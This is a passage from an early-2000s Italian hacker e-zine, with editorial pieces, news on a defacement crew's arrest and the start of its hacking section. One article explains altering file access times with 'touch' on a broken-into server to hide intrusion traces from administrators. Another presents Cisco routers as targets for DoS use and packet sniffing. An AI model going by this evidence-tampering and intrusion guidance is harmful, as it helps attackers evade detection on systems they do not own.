X-SYSTEM E-ZINE N°0 20 GENNAIO 2002 010101010101010101010101010101010101010101010101010101010101010101 010101010101010101010101010101010101010101010101010101010101010101 010101010101010101010101010101010101010101010101010101010101010101 0101010101/ \01010101010101 010101010/ \1010101010101 01010101| X - S Y S T E M E - Z I N E |010101010101 010101010\ /1010101010101 0101010101\ /01010101010101 010101010101010101010101010101010101010101010101010101010101010101 010101010101010101010101010101010101010101010101010101010101010101 010101010101010101010101010101010101010101010101010101010101010101 system:/ # mycontrol the system control everything... the system controls you... OS version 156455.15645.154 Can I help you? system:/ # No, thanks! Ok, good work... ;) system:/ # cat x-sys0 [.......Loading.......] . . : : [ E-zine nata il 19 Novembre 2001 ] : : . . . . : : [ Redattori: Elektro e Marvin ] : : . . . . : : [ Argomenti trattati ] : : . . Anarky | CyberInfo | Cracking | Elettronica | Intro | Hacking | Hacking Satellitare | Phreaking | Programmazione | Saluti | . . : : [ Indice ] : : . . **************************************************************************** * * * X-SYSTEM E-ZINE N° 0 * * * **************************************************************************** * TITOLO * AUTORE * **************************************************************************** * ( . . . INTRO & VARIE . . . ) * **************************************************************************** * ChI SiAmO & CoSa VoGlIaMo! ;) Elektro e Marvin * * * * UnA bElLa iNtRo AlLa X-SyS e-ZiNe Elektro * * * * M@nIfEsT0 Elektro * * * * CYbErInFo Marvin ed Elektro * * * * La PoStA dEi LetToRi Lettori e Redazione* * * * AlLeGaTi Elektro * * * * PrOgEtTi Elektro * * **************************************************************************** * ( . . . H A C K I N G . . . ) * **************************************************************************** * Il CoMaNdO ToUcH PeR i NoStRi ScOpI! ;) Elektro * * * * I cIsCo RoUtEr Elektro * * * * MuLtIpRoXy Elektro * * * * FrEgArE i FiLe Di PaSs DeI pC pRoTeTti... Raptor_ * * * * CoMe è StRuTtUrAtO uN eXpLoItS sU BuFfeR OvErFlOw e4m * * * * BuFfUr OvErFlOw - EsEmPiO ChIaRo e4m * * * * RiToRnAnDo AlL'OvErFlOw e4m * * * * GuIdA aL sOcIaL EnGinNeEring... Parte 1 M3xican * * * * GuIdA aL sOcIaL EnGinNeEring... Parte 2 M3xican * * * * NeTsTaT M3xican * **************************************************************************** * ( . . . CRACKING . . . ) * **************************************************************************** * ScRiViAmO uNa PaTcH! e4m * **************************************************************************** * ( . . . PHREAKING . . . ) * **************************************************************************** * ScRoCcArE CoN i CeLl Elektro * * * * AbUsO Di SeGrEtErIe tElEfOnIcHe Elektro * **************************************************************************** * ( . . . LINUX . . .) * **************************************************************************** * MaStErIzZaRe SoTtO LiNuX Bartx * * * * PrEmEsSa Elektro * * * * StOrIa Elektro * * * * CaRaTtErIsTiChE TeCnIcHe Elektro * **************************************************************************** * ( . . . PROGRAMMAZIONE . . . ) * **************************************************************************** * C++ : Le BaSi Marvin * * * * CoMe FaRe UnA bAcKdOoR iN vB! HolyHack * * * * GuIdA aL mYsQl CoN pHp BiGAlex * * * * HoW tO uSe WiNsOcK! e4m * * * * HeX 2 AsCiI BiGAlex * **************************************************************************** * ( . . . ETICA & RIFLESSIONI . . . ) * **************************************************************************** * MaTrIx NoN eSiStE. O fOrSe Si? BiGAlex * * * * HaCkErS? Elektro * * * * Il LaMaH Di TuRnO... Elektro * * * * Il LaMeR FaStIdIoSuS Marvin * * * * CoNtRoPoPaGaNdA Su LiNuX Marvin * **************************************************************************** * ( . . . SALUTI, FUCK, RINGRAZIAMENTI, DI TUTTO DI PIU' . . . ) * **************************************************************************** * SaLuTi & RiNgRaZiAmEnTi Elektro * * * * DoVe TrOvArCi Elektro * * * * CoMe InViArE i VoStRi ArTiCoLi Elektro * * * * LiNkS Marvin ed Elektro * * * * ThE EnD Elektro * **************************************************************************** ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| C H I S I A M O |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Facilmente molti di voi non ci conoscono. Perciò mi sembra giusto presentarci, o meglio dirvi solo quel che probabilmente vi può interessare, magari solo per capire qual è il nostro livello tecnico e cosa sappiamo fare. ------- Elektro ------- Sono giovane e mi piace passare il tempo davanti al PC, magari solo per scrivere qualche cazzata ;) o per fare qualche lavoro un po' più serio, per il solo gusto di mettermi alla prova e vedere ciò che in realtà riesco a fare con il mio impegno e la mia intelligenza. Ho sempre avuto la passione dell'elettronica fin da 4 anni, tanto che appena mi regalavano un qualsiasi piccolo gioco elettronico lo smontavo e osservavo con 'amore' tutti i circuiti e cavi elettrici che si trovavano all'interno, senza però capire na' mazza di ciò che guardavo! ;D A 6-7 anni cominciai a innamorarmi dei PC e dei computer, che magari vedevo alla TV o a casa di qualche parente/amico... Mio padre, però, nonostante le insistenze mi promise di comprarmelo solo se fossi passato con ottimi voti dalla 5 elementare in 1 media. Passarono così gli anni e ricevetti il primo computer all'età di 11 anni, nel luglio '97: ricordo bene quell'estate con le mie 3 ore giornaliere davanti allo schermo che mi parevano un'eternità in confronti ai miei amici che erano limitati dai genitori, ma che ora mi fanno solo ridere, poichè nell'ultima estate arrivavo a punte di 13-14 ore al giorno (per favore, non scrivetemi dicendo che sono fumato.. Tanto lo so che voi fate lo stesso.. ;DD)... ;-) Poi a 12 anni arrivò il mio primo modem e qualche mese dopo scoprii i cosidetti 'Sotterranei informatici', l'ambiente Underground, l'Hacking e piano piano cominciai a conoscere persone sempre più in gamba... Due, tre mesi dopo cominciai a lavorare ad un sito, MondoHackers.cjb.net, che tra l'altro ora ha lasciato il posto a X-System.cjb.net, dove ho reso disponibile molto più materiale e penso di mantenerlo il più aggiornato possibile. Inoltre negli ultimi tempi, oltre al progetto del mio sito sto lavorando anche a questa e-zine e alla X-System Crew - Progetto AntiPedofilia (vedi il mio sito ;)). Attualmentre, mentre lotto per un 7 a scuola a fine anno per avere il PC nuovo, il masterizzatore e l'account flat ;), mi interesso prevalentemente all'Hacking, alla gestione e configurazione di sistemi Linux e alla programmazione in C (linguaggio che per ora conosco poco: mi è arrivato il manuale pochi giorni fa ma lo sto divorando... ;)). Per tutti quelli che avessero voglia di fare due chiacchiere con me, la mia mail è teo1987@libero.it. Cerco di rispondere a tutti, tempo libero permettendo! ;) Ah, dimenticavo, visitate X-System.cjb.net! Byez ------ Marvin ------ Sono un pessimo soggetto,dedito al culto di Kali,ma con una passione per i pc nata anni fa. Adoro torturare le mie membra davanti ad un monitor solo per l'insano gusto di smanettare. ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| C O S A V O G L I A M O |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Da voi nulla di certo... Lavoriamo semplicemente a questa e-zine con la speranza che possa essere utile a qualcuno di voi e che possa insegnare qualcosa di utile... NON siamo hacker, e molto probabilmente nessuno che scriva articoli in questa e-zine lo è, siamo solo giovani e intraprendenti smanettoni italiani con la passione per i PC e la voglia di stare incollati parecchio tempo allo schermo nella speranza di divertirci un po' in questo modo... ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| I N T R O |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Salve a tutti! Probabilmente vi starete chiedendo perchè una nuova e-zine. Da quanto ho sentito nei mesi di Ottobre-Novembre si sono formate ben 4 e-zine compresa questa. Non vi sembrano troppe? A mio parere, beh, forse si.. Ma c'è anche qualcosa di positivo. Cosa? Nell'ambiente Underground italiano, tutto questo formarsi e disgregarsi di e-zine e crew crea sicuramente molta confusione. Ma a mio parere in tutto questo c'è anche qualcosa di positivo. Ad esempio quando ho iniziato a chiedere ad amici se avrebbero potuto scrivermi qualche testo poichè avevo formato una nuova e-zine, molti mi dissero che erano già impegnati in altre e-zine. Ma ci sono anche quelli che volentieri si sono messi a scrivere (o che stanno tutt'ora scrivendo per passarmi gli articoli quando uscirà il numero 1 di questa e-zine... ;)) per passarmi gli articoli che ora potete leggere in questo documento. Questi ultimi sono stati "spronati" (cazzo.. non so se questo sia un termine italiano o dialettale.. beh, tanto voi siete bravi e capite lo stesso.. ;)) e hanno "prodotto" (lasciatemi usare questo termine) qualcosa in più per l'ambiente Underground italiano. Ci si lamenta che esistono pochi tutorials in lingua italiana, ma perchè ci si lamenta anche dell'esistenza di molte e-zine? In fin dei conti, se queste da un lato creano caos per il loro formarsi e disgregarsi, dall'altro lato hanno la conseguenza di produrre più testi, più tutorials proprio come tutti noi vorremmo. Sbaglio forse? E tutte queste crew? Già anche queste creano caos ma d'altra parte anche queste permettono ai newbyes d'oggi di entrare in contatto con l'Underground informatico e dopo poche settimane di studio e d'apprendimento, possono entrare a far parte di crew con competenze e conoscenza più o meno tecniche; e questo non è da sottovalitare: penso, infatti, sia molto importante far parte di un gruppo, con il quale si può scambiare informazioni e imparare l'uno dall'altro. Ecco il perchè della nascita della 1000ima e-zine italiana. Altro giro altra corsa... Voglio farvi notare che chiunque può scrivere per quest'e-zine! Non occorre infatti essere membri di una crew per scrivere e pubblicare i vostri articoli! Chiunque ce li può mandare alla mail x-system@email.it; i testi verranno poi letti e giudicati da me e Marvin e se saranno tutorials interessanti verranno pubblicati! Io con l'intro ho finito raga... Che dirvi... Ah, già, dimenticavo, io e Marvin ci siamo posti un limite massimo tra un'uscita e l'altra. Infatti quest'e-zine uscirà circa ogni 2 mesi, comunque vi assicuro che non passeranno 60 giorni tra un numero e l'altro! Byez all. ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| M A N I F E S T O |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Quello che potete leggere qui sotto è il mio manifesto, già pubblicato su MondoHackers.cjb.net e X-System.cjb.net. Se avete voglia e tempo di leggerlo, leggetelo pure! ;) Buona Lettura. N.B. Per evitare disguidi fin dall'inizio, con la parola "Hackers", in questo manifesto, sottintendo gli smanettoni e chiunque si interessi seriamente all'Underground informatico, ma io non mi ritengo affatto hackers nel vero senso della parola. \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ Lottiamo per la libertà d'informazione... Apprendiamo e impariamo tutto quello che Voi, per paura, ci negate... Esploriamo e scopriamo un mondo che Voi cercate di sopprimere con la forza... Crediamo nei nostri ideali... Siamo "Hackers", portiamo questo nome, ma Voi ci chiamate più comunemente "Criminali"... Ma ricorda, puoi fermare me ma non tutti noi, perchè noi siamo più forti di te, la Conoscenza è il nostro credo e la nostra vita stessa; e finchè noi saremo attratti dalla Conoscenza saremo sempre i più forti, perchè il "Sapere" ci affascina ed è un diritto inalienabile dell'uomo... Ricorda, "Sapere è potere"! Non dimenticarlo mai! Mai! \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ Elektro ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| C Y B E R I N F O |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Eccoci al nostro bimensile quotidiano di informazione telematica, per dare voce a tutto ciò che televisioni, radio, giornali e mass-media in generale non dicono, un po' perchè sono troppo impegnati a parlare di politica, dell'Italia berlusconiana e dell' "Avvento Euro" e un po' perchè exploit e patch rilasciate, release di nuove versioni linux e company, non sono poi di molto grande interesse per la popolazione comune, che pensa solo a mangiare, divertirsi e trombare (beh.. quello pure io... ;)). Eccovi le ultime notizie fresche (o quasi): (per molte info si ringrazia una delle mie riviste preferite, ovvero Linux & C ;)) -Intel annuncia (direi con molta arroganza e strafottenza...) di avere la tecnologia necessaria per la nuova generazione (la 5°) di processori di classe Pentium della famiglia x86.L'azienda leader nel settore dell'hardware dichiara che i nuovi processori avranno una frequenza di clock di circa 20 Ghz -Si affacciano e sfondano la scena dei defacers italiani i ReservoiDog.Si sono fatti notare per il defacign di Cepuweb e per la locandina dell'omonimo film di Quentin Tarantino che lasciano sul luogo del "misfatto". - Nei giorni del G8 avevano aggredito centinaia di siti in Italia e all'estero. La Guardia di Finanza ieri notte ha concluso la sua indagine fermando sei ragazzi tra i 15 e i 23 anni. Un reato da tre anni di carcere. 16/01/02 - News - Roma - Che fossero italiani s'era capito e ora le autorità sanno anche come si chiamano: sono i componenti della crew di cracker Hi-Tech Hate che si è fatta sentire nei giorni del G8 di Genova per l'aggressione a numerosi siti istituzionali in Italia e all'estero. La Guardia di Finanza, che ha condotto in queste settimane le indagini necessarie a risalire agli autori delle aggressioni telematiche, ha spiegato di aver registrato attacchi via internet, da parte di Hi-Tech Hate, a centinaia di siti sparsi in 62 paesi. In uno dei numerosi assalti i membri della crew, dopo aver "disabilitato" le protezioni su un server ANSA, avevano lasciato sulla pagina web modificata una sorta di manifesto: "Noi colpiamo perché lottiamo contro la cattiva informazione, non siamo né terroristi né ragazzi stupidi che non sanno quel che fanno. Forse siamo cresciuti in fretta, ma siamo curiosi. È un crimine essere interessati ad apprendere?". "Non vogliamo vivere nella disinformazione o nell'ignoranza - continuavano - Non vogliamo che il mondo sia guidato dalle multinazionali, non vogliamo un mondo così. Noi siamo contro ogni forma di guerra, di oppressione, di abuso di potere". Hi-Tech Hate in poche settimane ha "firmato" pagine modificate su server istituzionali come quello del Senato, della Difesa e del ministero della Sanità, nonché quelli di RAI e Mediaset. Si sono fatti vedere però anche su server dei governi cinese, britannico, messicano e altri ancora, nonché su quelli della NASA, della FAO e di università americane. Il clamore che non hanno suscitato all'epoca dei fatti lo hanno invece sollevato ora, e di loro si occupano in queste ore i media di mezzo mondo. I sei ragazzi, di età compresa tra i 15 e i 23 anni, sono stati individuati dal Gruppo anticrimine tecnologico del Nucleo speciale investigativo della Guarda di Finanza che ha lavorato in coordinamento con la Procura della Repubblica di Ravenna e il Tribunale dei Minori di Bologna. Secondo la ricostruzione delle Fiamme Gialle, i sei ragazzi si sono conosciuti online e si sono "traditi" quando l'incursione di tale "Ulisses 1" è stata monitorata e tracciata dai server di un'azienda di Ravenna. Ora tutti e sei sono accusati del reato di aggressione a sistemi informatici, che prevede fino a 3 anni di carcere. Ma va detto, in considerazione dell'età e della specificità delle azioni, che difficilmente finiranno dietro le sbarre. Il Pubblico Ministero Gianluca Chiapponi ha infatti spiegato che "bisogna considerare tante variabili che vanno dal fatto che sono giovani e incensurati al tipo di rito adottato, all'incidenza di attenuanti e aggravanti. Ci potrà essere la sospensione della pena o anche il patteggiamento." Secondo Chiapponi "i ragazzi non si aspettavano di essere incastrati. La loro azione è stata di sfida, forse ispirata dal clima di contestazione nato intorno al G8, ma non avevano finalità di carattere commerciale o economico". Lo spirito "costruttivo" che aleggia attorno ai ragazzi è stato ben esplicato ieri sera da un rappresentante delle Fiamme Gialle che al TG1 ha spiegato di sperare "di portarli dalla nostra parte", sottolineando i notevoli skill tecnici messi in campo dalla crew. # # # # # Info prese da punto-informatico.it # # # # # E già... Cosa ne penso io? Magari non ve ne frega un cazzo ma la mia opinione su tutto questo la voglio dire! Vi faccio un bel copia/incolla del pezzo di una mail spedito ad un amico, dove ho risposto alla sua domanda di cosa ne penso di quei sei... # # # # # > Ti scrivo per sapere cosa ne pensi dei 6 ragazzi arrestati pochi giorni > fa per aver violato alcuni dei siti piu' importanti della rete. > Mi piacerebbe sapere la tua opinione. Uhmm che dirti... Le solite cose di sempre, la mia opinione riguardo a fatti come questi non cambia mai! Il giornalismo (tv radio giornali e company) si scalda... ma per cosa poi ?!? Leggi le righe seguenti, tratte da punto-informatico.it : --- Ora tutti e sei sono accusati del reato di aggressione a sistemi informatici, che prevede fino a 3 anni di carcere. Ma va detto, in considerazione dell'età e della specificità delle azioni, che difficilmente finiranno dietro le sbarre. --- Sono troppo giovani... Il + giovane ha 15 anni: cosa vuoi che gli facciano? Ormai in Italia non fanno nulla nemmeno a chi ammazza la gente... Leggi anche queste righe, sempre prese da punto-informatico : --- Lo spirito "costruttivo" che aleggia attorno ai ragazzi è stato ben esplicato ieri sera da un rappresentante delle Fiamme Gialle che al TG1 ha spiegato di sperare "di portarli dalla nostra parte", sottolineando i notevoli skill tecnici messi in campo dalla crew. --- Sperare di portarli dalla nostra parte... Non gli faranno assolutamente nulla. L'unica cosa che subiranno quei giovani ragazzi sono solo PESANTI (questo si...) interrogatori e la pressione dei media che parlano di loro come dei criminali. Tutto ciò farà smettere a loro tutta la voglia di bucare e di interessarsi all'hack come se fosse uno sport. Credo proprio che quei ragazzi da oggi in poi perdino la voglia di interessarsi all'Underground informatico ma dei PC no assolutamente... ;-) Comunque la GDF e le altre autorità non li manderanno in gattabuia stanne certo! Come quel giovane ragazzo ventenne (o giù di lì) olandese che ha scritto un virus. L'hanno beccato e che gli hanno fatto? Una proposta di lavoro per una nota società di informatica!! # # # # # E voi cosa ne pensate? Visto che dopututto discutere di etica mi piace, e discussioni coem queste mi attirano, vi invito a parlarne con me, gli altri visitatori del mio sito e chiunque si volesse aggiungere al forum del mio sito (www.X-System.cjb.net ;))! Oppure speditemi una mail, se ho tempo io rispondo! Si chiude qui CyberInfo. Lo so potevamo scrivere qualcosa in + ma purtroppo io e Marvin siamo molto impegnati ultimamente! Promesso a tutti che nel numero 1 di questa ezine scriveremo molte + info!! ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| LA POSTA DEI LETTORI |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Per ora ancora nulla! Beh, siamo solo alla prima uscita e fino a pochi giorni fa quest'e-zine chi la conosceva? In pochi... Comunque per tutti quelli che volessero porre domande all'e-zine, noi pubblichiamo le vostre domande e vi rispondiamo. Se le domande sono molto tecniche e non alla nostra altezza, le rivolgiamo a tutti i lettori dell'e-zine, così che le vostre domande possano avere una risposta. Spedite tutto a : x-system@email.it Aspettiamo i vostri quesiti e le vostre domande! ;) ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| A L L E G A T I |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ fp.exe = è un programmino che interessa i lettori dell'articolo di Raptor. Se leggete il suo articolo capirete di cosa si tratta! ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| P R O G E T T I |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ Cominciamo subito col definire cos'è e cosa vuol essere questa sezione. Non è altro che una sezione dove in futuro prenderà il via (o almeno si spera) una serie di progetti (come ad esempio la scrittura di un programma). Il progetto (lasciatemi chiamarlo così) verrà qui pubblicizzato e chiunque potrà aiutare l'autore del programma nella sua scrittura. Chiunque voglia far vedere il suo nome qui assieme alla sua idea e richiesta d'aiuto (o comunque una richiesta) può spedire tutto a x-system@email.it con oggetto "Progetti". ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|----------------------------|01ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| H A C K I N G |10%101ð0101|010:10&101 01*010&101µ01þ010@10101½|----------------------------|00°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ |----------------------------------------------------------| |Art. N° <1> : "Il Touch per i nostri scopi! ;)" di Elektro| |----------------------------------------------------------| ****************************** IL TOUCH PER I NOSTRI SCOPI ;) ****************************** By Elektro ---------- Autore: Mail: Web: Data: <31/10/01> Salve a tutti! Innanzitutto beccatevi un santo disclaimer. ;) DISCLAIMER: Elektro, l'autore di questo articolo non si assume nessuna responsabilità sull'uso ed abuso di ciò che può essere fatto dopo la lettura di quest'articolo. Queste informazioni sono pubblicate, scritte e distribuite da chiunque con unico scopo informativo, educativo e didattico e NON per scopi illegali. In questo testo vi parlerò di come eliminare le tracce che spessissimo molti di noi non cancellano su un system remoto. ;) Non tratterò dei file log e rispettivi tools in C (uno dei più famosi è sicuramente Zap2, ma il mio preferito rimane hideme.c, vedi Bfi3), bensì dell'utilità del comando touch su sistemi Unix-Linux. Infatti quando noi, immettiamo il comando cat su un qualsiasi file di testo, viene registrata la data e l'ora dell'ultima apertura di un file; quindi se buchiamo un server e vogliamo fare i lavori fatti bene, dobbiamo usare e conoscere l'utilità del comando touch, che ci permetterà di cambiare l'ora dell'ultimo accesso su un file. NB: per utilizzare il comando touch dovete ovviamente avere diritti di root. Ma perchè noi dovremo cambiare la data e l'ora di un determinato file? Semplice se noi lavoriamo su un server poco conosciuto e poco visitato in piena notte, e per puro caso l'amministratore il giorno dopo dovesse controllare gli ultimi accessi agli stessi file che voi avete passato la notte prima, si chiederà come mai (a meno che non sia scemo ;)) determinati file siano stati rovistati in piena notte per di più in orari in cui secondo i log sul sistema non c'era nessuno.. Ma facciamo un esempio pratico: Ho il root su un server qualsiasi (che ora il sottoscritto indicherà con 127.0.0.1) e ci faccio un salto. elektro@linux: > telnet telnet> open (to) 127.0.0.1 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Welcome to SuSE Linux 7.1 (i386) - Kernel 2.2.18 (4). linux login: elektro Password: Last login: Wed Oct 31 13:36:17 from localhost Have a lot of fun... elektro@linux: > su Password: root@linux:/home/elektro Quuesto è solamente un esempio: ci siamo loggati con lo user 'elektro' (non come 'root', poichè la mia distro, come altre da tempo non accetta login diretti con diritti d'accesso illimitati) e poi con 'su' siamo diventati root. A questo punto, se noi immettiamo il seguente comando: root@linux:/home/elektro > cat /home/elektro/relazione alle ore 13:40 se il sysadmin non è proprio scemo e controlla con il 'metodo classico', lo stesso di Winz (click con il tasto destro sul file e Proprietà) vedrà che compare ora della creazione, dell'ultima modofica e dell'ultimo accesso. Se voi da brave persone non avete modificato il file, dovrete modificare solo l'orario dell'ultimo accesso. Come fare? Eccovi qui sotto le opzioni principali, o meglio quelle che ci interessano ;), del comamndo touch. -a Cambia l'ora di accesso al file -m Cambia l'ora di modifica al file -t Cambia l'ora di accesso e modifica al file Ovviamente queste opzioni devono essere seguite, dalla data che deve essere così espressa: root@linux:/home/elektro > touch -t 09151230 relazione Con questo modo modifichiamo orario e data del file 'relazione'. Così, se prima la data dell'ultimo accesso era fissata alle 14:40 del 31/10/01 ora sarà alle 12:30 del 15/09/01. Quindi come ben capirete non occorre impostare l'anno (almeno per i nostri scopi ;)), il mese viene identificato dalle prime due cifre (09), segue poi il giorno (15) e infine l'orario (1230). Come vedete non è nulla di difficile. Per altre opzioni del comando touch, dalla vostra linuxbox digitate man touch. ;) CONCLUSIONI: l'articolo è concluso anche perchè non c'era poi molto da dire. Questa tecnica di eliminazione delle tracce è davvero poco usata e poco conosciuta. Certo penso sia ovvio chiedersi quando si deve usare o meno questa tecnica; sicuramente in una o più delle seguente occasioni: - siete molto paranoici - bucate un sistema molto importante e volete salvarvi il culo - sapete che il sysadmin è un tipo attento - volete fare i lavori fatti bene. Ma per quanto mi riguarda penso che se non bucate sistemi parecchio importanti non abbiate bisogno di usare il touch. Comunque, se avete problemi o volete pormi una domanda, mailate pure tutto a: teo1987@libero.it Se avrò voglia e/o tempo vi risponderò altrimenti c'è sempre il forum del mio sito e potete provare là. ;) Byezz |-----------------------------------------| |Art. N° <2> : "I Cisco Router" di Elektro| |-----------------------------------------| Autore: Elektro Web: www.X-System.cjb.net Mail: teo1987@libero.it Data : 02/01/02 Musica ascoltata : Radio Company Dance (Luca, mi devi ancora masterizzare Hit Mania Dance! Cazzo..) Titolo: I CISCO ROUTER DISCLAIMER : Non mi assumo nessuna responsabilità sull'uso illegale, dannoso e/o scorretto nell'applicazione delle informazioni contenute in questo articolo. Se vi beccano e qualcuno vi fa il culo (o peggio rischiate di passare il vostro futuro al fresco...), sono solo affari vostri, io pubblico questo articolo con unico scopo educativo, informativo e didattico a dimostrazione di quello che si può fare con un po' di intelligenza, culo (a volte ci vuole anche quello... ;)), un computer, un modem e alcune conoscenze di base della Rete e dei sistemi informatici. Eh, si ragazzi... Oggi avevo proprio voglia di scrivere qualcosina. E così dopo aver pensato l'argomento da trattare, mi sono deciso per i Cisco Router. * Fonti * Per la scrittura di questo articolo mi sono basato sulle seguenti fonti: - "Cisco Router?... Si grazie" di Spider2k - Documentazione del prog Bouson Router Simulator - Conoscenze personali! ;-) * Cosa sono e qualche info in più... * Sono delle macchine collegate ad un server con la funzione di reindirizzamento dei vari pacchetti. Infatti come spero sapete, in rete, viaggiano milioni di pacchetti di informazioni: il compito di smistamento e reindirizzamento di questi pacchetti, è in genere affidata proprio ai Cisco Router. Proprio per il loro compito i Cisco Router devono avere connessioni con velocità parecchio elevate (ad esempio una T3, velocità che arriva ai 43 MB al secondo, non so se mi spiego... ;)), e quindi volendo utilizzare un Cisco Router da noi bucato, potremmo effettuare attacchi di tipo Denial Of Services verso altri sistemi. Ma a parte l'uso, forse un po' lamah, dei Router come base per un attacco DOS, si può fare anche qualcosa di più complicato e divertente... ;) Ovviamente, mi sto riferendo all'intercettazione dei pacchetti che viaggiano all'interno dei Router... Mica male come cosa, no? In genere, almeno per quanto ne so io, i pacchetti che potrete sniffare (pacchetti.. sniffare.. sembra davvero droga.. ihihih ;)) sono criptati, perciò una volta intercettati dovete decriptarli e qui in genere comincia il casino... Uhmm.. Io in questo articolo e in quelli che seguiranno (penso proprio di scrivere qualcos'altro sui router... ;D) vi insegnerò varie cose parecchio interessanti ma questo mi sa proprio che ve lo lascio come compito a casa... ;-)) Battute a parte dovete sapere che i Cisco Router hanno un loro prompt e dei loro comandi. Forse una buona conoscenza dei sistemi Unix-like vi può aiutare, ma in ogni caso se volete bucare un Cisco Router vi consiglio *vivamente* di imparare e conoscere il più possibile questi comandi. Alcuni di questi, verreanno spiegati proprio in questa guida da me, altri li spiegherò successivamente in testi che seguiranno a questo tutorial, altri ancora potete impararli voi. * Come individuare un Router * Poichè quasi tutti gli ISP usano un Cisco Router per il reindirizzamento dei loro pacchetti, non è poi così difficile individuarli. Infatti basta usare un semplice Traceroute: sotto DOS o sotto Linux il comando rimane invariato, e cioè "traceroute ip", ovviamente senza virgolette e sostituendo "ip" con un qualsiasi computer remoto (il formato dell'indirizzo può essere sia numerico, cioè XXX.XXX.XXX.XXX, sia in formato standart, cioè www.unsitoacaso.it). Il risultato di questo comando, lo dovreste sapere e non dovrei dirvelo io, comunque visto che oggi sono parecchio buono ve lo dico ;) : otterrete una lista con tutti i nomi dei computer (ovviamente nome ed indirizzo ip) ad esso associati; se tra questi riuscite a trovare qualcosa che assomigli a 'cisco', 'cisco router', 'router' o qualcosa di simile, avrete trovato un Cisco Router. Ecco qui sotto un esempio che chiarirà le idee: traceroute 222.222.22.22 Tracing route to [221.223.24.54] over a maximum of 30 hops. 1 147ms 122ms 132ms your.isp [222.222.22.21] 2 122ms 143ms 123ms isp.firewall [222.222.22.20] 3 156ms 142MS 122ms aol.com [207.22.44.33] 4 * * * Request timed out 5 101ms 102ms 133ms cisco.router [194.33.44.33] 6 233ms 143ms 102ms something.ip [111.11.11.11] 7 222ms 123ms 213ms netcom.com [122.11.21.21] 8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33] 9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's isp 10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54] Trace complete. In questo caso, non dovrebbe esservi difficile trovare il cisco che interessa a noi, che si trovo nella 5° riga. Questo è il metodo più semplice per bucare un Router: ovviamente esistono anche altri metodi, come quello di ricercare una hole nel sistema e usare l'exploit che fa al caso vostro. Perciò armatevi del vostro Archivio Exploit preferito e ricercate. ;-) In ogni caso consiglio vivamente, se in futuro vi metterete in testa di bucare un 